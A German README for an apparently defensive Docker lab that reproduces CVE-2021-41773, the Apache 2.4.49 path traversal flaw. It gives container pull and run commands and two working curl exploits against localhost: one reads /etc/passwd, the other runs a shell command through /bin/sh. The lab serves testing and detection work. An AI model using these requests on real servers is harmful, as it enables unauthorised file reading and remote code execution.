
Docker-basiertes verwundbares Labor für CVE-2021-41773 Apache Path Traversal, das PoC-Konfigurationen für Dateilesen und Remote-Code-Ausführung in einer kontrollierten Umgebung bereitstellt.
Diese Schwachstelle gilt nur für Version 2.4.49 mit bestimmten nicht standardmäßigen Konfigurationen. In bestimmten Situationen kann dies entweder zu Dateiauslesen oder Codeausführung führen.
https://twitter.com/ptswarm/status/1445376079548624899
Container können direkt von Docker Hub bezogen werden mit
docker pull blueteamsteve/cve-2021-41773:no-cgid
und ausgeführt werden mit
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Die Apache-Logs können mit dem folgenden Befehl angezeigt werden, oder lassen Sie einfach das "-dit" aus dem obigen run-Befehl weg, um stdio zu streamen
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Container können direkt von Docker Hub bezogen werden mit
docker pull blueteamsteve/cve-2021-41773:with-cgid
und ausgeführt werden mit
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Die Apache-Logs können mit dem folgenden Befehl angezeigt werden, oder lassen Sie einfach das "-dit" aus dem obigen run-Befehl weg, um stdio zu streamen
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Ändern und erstellen Sie Ihre eigenen Versionen mit der Dockerfile und den Vorlagendateien httpd.conf in den Unterverzeichnissen